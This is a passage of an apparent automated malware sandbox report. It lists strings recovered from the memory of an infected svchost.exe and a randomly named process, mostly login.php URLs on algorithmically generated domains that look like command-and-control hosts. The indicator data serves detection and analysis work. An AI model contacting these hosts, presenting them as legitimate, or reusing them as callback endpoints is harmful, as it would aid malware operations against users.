svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynuz.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynuz.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynyh.com/login.php
Source: svchost.exe, 00000002.00000003.1661503631.000000000333D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664095073.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacypiw.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844960136.000000000CCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845988945.000000000CCB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyroh.com/
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1667816249.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675053991.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677637599.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668142095.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683902342.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1948330211.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677712725.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681955715.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1667454914.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyryb.com/login.php
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691597706.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gacyryw.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522449527.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565950608.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522570202.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyzuz.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951392830.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708272714.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699419339.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708385781.000000000CC69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2668649300.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyciz.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951392830.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699419339.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyciz.com/login.phpC:
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609086285.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadydas.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyfuh.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1470630285.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gadyfuh.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykyz.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1707434591.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gadyniw.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674611166.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950331749.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950940753.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675004112.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951109934.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951994053.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadynub.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypah.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684006366.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1678100644.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyqaw.com/login.php
Source: svchost.exe, 00000002.00000003.1523662204.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2611842069.000000000323D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612069881.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523218130.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyveb.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvez.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyzib.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyces.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600952988.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600106143.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600135684.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydoh.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643374628.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638510682.000000000CCE2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641752374.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydyb.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523662204.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfyz.com/login.php
